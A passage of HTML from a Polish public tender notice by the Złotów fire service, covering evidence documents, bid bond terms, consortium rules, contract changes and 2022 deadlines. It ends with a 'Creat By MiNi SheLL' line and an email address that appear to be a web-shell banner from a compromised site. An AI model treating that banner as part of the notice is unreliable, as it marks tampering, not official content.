lub<br/>miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o których mowa<br/>w ust. 4 pkt 2, składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę<br/>lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono<br/>upadłości. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące<br/>przed upływem terminu składania ofert.6. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce<br/>zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 4 pkt 2, zastępuje się je w całości<br/>lub części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby<br/>albo osób uprawnionych do jego reprezentacji, złożone przed notariuszem lub przed organem<br/>sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze<br/>względu na siedzibę lub miejsce zamieszkania Wykonawcy.7. Wykonawca nie jest zobowiązany do<br/>złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli Wykonawca wskaże<br/>te środki oraz potwierdzi ich prawidłowość i aktualność.8. W zakresie nieuregulowanym ustawą PZP<br/>lub niniejszą SWZ do oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu<br/>zastosowanie mają w szczególności przepisy rozporządzenia Ministra Rozwoju Pracy i Technologii z<br/>dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy oraz rozporządzenia Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Przedmiotowy środek dowodowy w postaci prezentacji oferty asortymentowej wraz ze wzornikami, a także niezbędnymi certyfikatami oraz atestami - szczegółowy wykaz w zał. nr 13 do SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości:<br/>6.000,00 zł (słownie: sześć tysięcy 00/100 złotych);2. Wadium wnosi się przed upływem terminu<br/>składania ofert.3. Wadium może być wnoszone w jednej lub kilku następujących formach:1)<br/>pieniądzu; 2) gwarancjach bankowych;3) gwarancjach ubezpieczeniowych;4) poręczeniach<br/>udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada<br/>2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).4.<br/>Wadium w formie pieniądza należy wnieść przelewem na konto 33 8941 0006 0022 5748 2000<br/>0020 z dopiskiem „Wadium – PT.2370.1.2022”.UWAGA: Za termin wniesienia wadium w<br/>formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.5. Wadium<br/>wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub<br/>poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:1) musi<br/>obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez<br/>Wykonawcę określone w ustawie PZP 2) z jej treści powinno jednoznacznie wynikać<br/>zobowiązanie gwaranta do zapłaty całej kwoty wadium;3) powinno być nieodwołalne i<br/>bezwarunkowe oraz płatne na pierwsze żądanie;4) termin obowiązywania poręczenia lub<br/>gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym<br/>dniem związania ofertą jest dzień składania ofert); 5) w treści poręczenia lub gwarancji powinna<br/>znaleźć się nazwa oraz numer przedmiotowego postępowania;6) beneficjentem poręczenia lub<br/>gwarancji jest: Komenda Powiatowa Państwowej Straży Pożarnej w Złotowie7) w przypadku<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 PZP), Zamawiający<br/>wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu<br/>poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia (konsorcjum);6. Oferta wykonawcy, który nie wniesie<br/>wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do<br/>upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa<br/>w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona.7. Zasady zwrotu oraz okoliczności zatrzymania<br/>wadium określa art. 98 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty. 2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z<br/>Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu.3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi<br/>wykonają poszczególni wykonawcy w odniesieniu do warunków, które zostały opisane w ust. 2 -<br/>zgodnie z Załącznikiem nr 12 do SWZ. 4. Oświadczenia i dokumenty potwierdzające brak<br/>podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających<br/>się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia<br/>publicznego na warunkach określonych w Istotnych Postanowieniach Umowy, stanowiących<br/>Załącznik nr 2 do SWZ.2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z<br/>jego zobowiązaniem zawartym w ofercie.3. Zamawiający przewiduje możliwość zmiany zawartej<br/>umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 Pzp oraz<br/>wskazanym w Istotnych Postanowieniach Umowy, stanowiących Załącznik nr 2 do SWZ.4.<br/>Zamawiający przewiduje możliwość zmiany umowy na podstawie art. 455 ust. 2 ustawy PZP (do<br/>wysokości 15% wartości zamówienia podstawowego). 5. Zmiana umowy wymaga dla swej<br/>ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-04 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/straz_zlotow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-04 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com